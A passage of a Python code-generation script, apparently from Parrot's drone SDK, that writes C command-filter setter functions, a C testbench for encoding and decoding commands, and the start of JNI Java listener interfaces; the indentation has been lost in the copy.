cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' retStatus = filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior;\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
else:
cfile.write (' if (commandClass == '+ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS')+')\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' retStatus = filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Behavior;\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' //Else Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (localError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' retStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else : Keep retStatus if no error occured\n')
cfile.write ('\n')
cfile.write (' if (error != NULL)\n')
cfile.write (' {\n')
cfile.write (' *error = localError;\n')
cfile.write (' } // No else : Set error only if pointer is not NULL\n')
cfile.write ('\n')
cfile.write (' return retStatus;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// Filter ON/OFF functions')
cfile.write ('\n')
for ftr in allFeatures:
cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write ('\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Arg check\n')
cfile.write ('\n')
cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = behavior;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return retError;\n')
cfile.write ('}\n')
cfile.write ('\n')
if ftr.classes:#project only
for cl in ftr.classes:
cfile.write ('// Command class ' + cl.name + '\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write ('\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Arg check\n')
cfile.write ('\n')
cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior = behavior;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return retError;\n')
cfile.write ('}\n')
cfile.write ('\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Arg check\n')
cfile.write ('\n')
cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = behavior;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return retError;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// END GENERATED CODE\n')
cfile.close ()
def tb_generateCmds(ctx, paths):
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.TB__DIR):
os.makedirs (paths.TB__DIR)
if not os.path.exists (paths.LIN_TB_DIR):
os.makedirs (paths.LIN_TB_DIR)
if not os.path.exists (paths.COM_TB_DIR):
os.makedirs (paths.COM_TB_DIR)
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
else:
hasArgOfType[arg.argType] = True
#################################
# 11TH PART : #
#################################
# Generate C Testbench #
#################################
def TB_CALL_VARNAME (ftr, cmd):
return get_ftr_old_name(ftr) + ARCapitalize (format_cmd_name(cmd)) + 'ShouldBeCalled'
def TB_CREATE_VARNAME (ftr, cmd):
return 'int ' + TB_CALL_VARNAME (ftr, cmd) + ' = 0;'
cfile = open (paths.TB_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n')
cfile.write ('#include <libARSAL/ARSAL_Print.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('#include <string.h>\n')
cfile.write ('\n')
cfile.write ('int errcount;\n')
cfile.write ('char describeBuffer [1024] = {0};\n')
cfile.write ('\n')
for ftr in allFeatures:
for msg in ftr.cmds + ftr.evts:
cfile.write (TB_CREATE_VARNAME (ftr, msg) + '\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cmdNamePrint = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name
cfile.write ('void ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
cfile.write (xmlToC (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('void *custom)\n')
cfile.write ('{\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Callback for command ' + get_ftr_old_name(ftr) + '.' + cmdNamePrint + ' --> Custom PTR = %p", custom);\n')
for arg in cmd.args:
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "' + arg.name + ' value : <' + xmlToPrintf (ftr, cmd, arg) + '>", ' + arg.name + ');\n')
if ArArgType.STRING == arg.argType:
cfile.write (' if (strcmp (' + xmlToSample (ftr, cmd, arg) + ', ' + arg.name + ') != 0)\n')
else:
cfile.write (' if (' + arg.name + ' != ' + xmlToSample (ftr, cmd, arg) + ')\n')
cfile.write (' {\n')
if ArArgType.STRING == arg.argType:
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD ARG VALUE !!! --> Expected <%s>", ' + xmlToSample (ftr, cmd, arg) + ');\n')
else:
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD ARG VALUE !!! --> Expected <' + xmlToSample (ftr, cmd, arg) + '>");\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' if (' + TB_CALL_VARNAME (ftr, cmd) + ' == 0)\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD CALLBACK !!! --> This callback should not have been called for this command");\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'initCb') + ' (void)\n')
cfile.write ('{\n')
cfile.write (' intptr_t cbCustom = 0;\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ((' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ') ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ', (void *)cbCustom++ );\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'filterTest') + ' (uint8_t *buffer, uint32_t size, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' (*setter)(ARCOMMANDS_Filter_t *, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + '))\n')
cfile.write ('{\n')
cfile.write (' int errors = 0;\n')
cfile.write (' ARCOMMANDS_Filter_t *testFilter = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' filterError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' filterStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ';\n')
cfile.write (' // Default allow, set to block after\n')
cfile.write (' testFilter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', &filterError);\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while creating allow filter : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' // Change filter status\n')
cfile.write (' filterError = setter (testFilter, ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ');\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while setting filter state to blocked : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&testFilter);\n')
cfile.write (' }\n')
cfile.write (' // Default block, set to allow after\n')
cfile.write (' testFilter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', &filterError);\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while creating block filter : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' // Change filter status\n')
cfile.write (' filterError = setter (testFilter, ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ');\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while setting filter state to allowed : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&testFilter);\n')
cfile.write (' }\n')
cfile.write (' return errors;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ()\n')
cfile.write ('{\n')
cfile.write (' int32_t buffSize = 128;\n')
cfile.write (' uint8_t *buffer = malloc (buffSize * sizeof (uint8_t));\n')
cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' res = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ';\n')
cfile.write (' int32_t resSize = 0;\n')
cfile.write (' errcount = 0;\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'initCb') + ' ();\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cmdNamePrint = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name
cfile.write (' res = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (buffer, buffSize, &resSize')
for arg in cmd.args:
cfile.write (', ' + xmlToSample (ftr, cmd, arg))
cfile.write (');\n')
cfile.write (' if (res != ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while generating command ' + ARCapitalize (get_ftr_old_name(ftr)) + '.' + cmdNamePrint + '\\n\\n");\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Generating command ' + ARCapitalize (get_ftr_old_name(ftr)) + '.' + cmdNamePrint + ' succeded");\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err;\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (buffer, resSize, describeBuffer, 1024);\n')
cfile.write (' if (err != ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while describing buffer: %d", err);\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "%s", describeBuffer);\n')
cfile.write (' }\n')
cfile.write (' errcount += ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'filterTest') + ' (buffer, resSize, ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior);\n')
cfile.write (' ' + TB_CALL_VARNAME (ftr, cmd) + ' = 1;\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (buffer, resSize);\n')
cfile.write (' ' + TB_CALL_VARNAME (ftr, cmd) + ' = 0;\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Decode return value : %d\\n\\n", err);\n')
cfile.write (' if (err != ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write (' if (errcount == 0)\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "No errors !");\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "%d errors detected during autoTest", errcount);\n')
cfile.write (' }\n')
cfile.write (' if (buffer != NULL)\n')
cfile.write (' {\n')
cfile.write (' free (buffer);\n')
cfile.write (' }\n')
cfile.write (' return errcount;\n')
cfile.write ('}\n')
cfile.close ()
hfile = open (paths.TB_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY IT *\n')
hfile.write (' * *\n')
hfile.write (' * To add new commands : *\n')
hfile.write (' * - Modify ../Xml/commands.xml file *\n')
hfile.write (' * - Re-run generateCommandsList.py script *\n')
hfile.write (' * *\n')
hfile.write (' ********************************************/\n')
hfile.write ('#ifndef ' + TB_DEFINE + '\n')
hfile.write ('#define ' + TB_DEFINE + ' (1)\n')
hfile.write ('\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ();\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + TB_DEFINE + ' */\n')
hfile.close ()
cfile = open (paths.TB_LIN_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include "' + TB_HFILE_NAME + '"\n')
cfile.write ('\n')
cfile.write ('int main (int argc, char *argv[])\n')
cfile.write ('{\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ();\n')
cfile.write ('}\n')
cfile.close ()
def java_generateCmds(ctx, paths):
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.JNI_DIR):
os.makedirs (paths.JNI_DIR)
if not os.path.exists (paths.JNIJ_OUT_DIR):
os.makedirs (paths.JNIJ_OUT_DIR)
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
else:
hasArgOfType[arg.argType] = True
#################################
# 12TH PART : #
#################################
# Generate JNI C/Java code #
#################################
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile = open (paths.JNIJ_OUT_DIR + interfaceName (ftr, cmd) + '.java', 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Interface for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code> listener\n')
jfile.write (' * @author Parrot (c) 2013\n')
jfile.write (' */\n')
jfile.write ('public interface ' + interfaceName (ftr, cmd) + ' {\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Called when a command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code> is decoded\n')
for arg in cmd.args:
jfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n')
jfile.write (' */\n')
jfile.write (' void ' + javaCbName (ftr, cmd) + ' (')
first = True
for arg in cmd.args:
if first:
